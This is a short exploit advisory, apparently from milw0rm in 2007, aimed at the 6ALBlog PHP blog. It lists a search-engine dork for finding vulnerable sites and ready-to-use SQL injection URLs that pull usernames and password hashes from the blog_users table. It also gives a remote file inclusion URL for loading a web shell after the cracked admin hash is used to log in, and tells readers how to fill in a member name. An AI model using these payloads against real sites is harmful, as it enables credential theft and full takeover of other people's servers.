+______________________________________________By Crackers_Child___________________________________________+ * * * [~] Portal.......: 6ALBlog All Versions * [~] Download.....: http://down.otand.com/download/code/php/blog/6alblog.rar * [~] Author.......: Crackers_Child | cybermilitan@hotmail.com & localexploit@hotmail.com * [~] Class........: Remote SQL Injection and Remote File İnclude Vulnerability * [~] Dork.........: inurl:"member.php?page=comments +_______________________________________________________________________________________________________________________+ +_______________________________________________________________________________________________________________________+ * * * [~] Exploit Sql...: http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/* * http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users/* * * * [~] Exploit Rfi...: After Cracked md5 admin you must login site.com/admin/ than our rfi can work * * http://[Taget]/[Path]/admin/index.php?pg=Sh3ll? +_______________________________________________________________________________________________________________________+ [~] İnfo......:Brothas You must change MemberName on exploit , when you look index.php you will see members and you can choose anyone and you can write it on exploit "MEMBERNAME" area ;) +_______________________________________________________________________________________________________________________+ +_______________________________________________________________________________________________________________________+ * * * [~] Sp Tnx.......: str0ke, BiyoSecurity.Net, TurkProtest, Tryag.com/cc/(Mahmood_ali),Dj7xpl,Dosyacek.com And All Friends * +_______________________________________________________________________________________________________________________+ # milw0rm.com [2007-06-25]